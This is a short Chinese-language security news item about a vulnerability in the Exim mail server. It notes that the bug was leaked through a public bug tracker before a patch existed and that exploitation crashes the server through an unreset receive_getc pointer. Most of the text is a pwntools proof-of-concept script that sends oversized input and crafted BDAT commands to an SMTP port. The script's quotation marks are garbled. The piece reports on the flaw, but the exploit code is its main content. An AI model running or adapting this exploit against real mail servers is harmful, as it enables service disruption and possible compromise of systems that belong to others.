Exim 是剑桥大学开发的一款基于 GPL 协议的开放源代码软件，其主要用于连接互联网 Unix 系统的消息传输代理（MTA）服务器。目前，据三月份进行的一百多万台邮件服务器的分析表明，超过 56% 的用户正在使用 Exim 软件。

调查显示，该漏洞由一台公共bug跟踪器检测发现并在补丁发布之前意外披露。一旦黑客恶意利用，其系统将会处于崩溃状态，因为该函数指针的receive_getc并未被重置。以下是该漏洞部分概念验证代码（PoC）显示：

# pip install pwntools
from pwn import *

r = remote(‘localhost’, 25)

r.recvline()
r.sendline(“EHLO test”)
r.recvuntil(“250 HELP”)
r.sendline(“MAIL FROM:”)
r.recvline()
r.sendline(“RCPT TO:”)
r.recvline()
#raw_input()
r.sendline(‘a’*0x1100+’’)
#raw_input()
r.recvuntil(‘command’)
r.sendline(‘BDAT 1’)
r.sendline(‘:BDAT ’)
s = ‘a’*6 + p64(0xdeadbeef)*(0x1e00/8)
r.send(s+ ‘: ’)
r.recvuntil(‘command’)
#raw_input()
r.send(‘ ’)
r.interactive()
exit()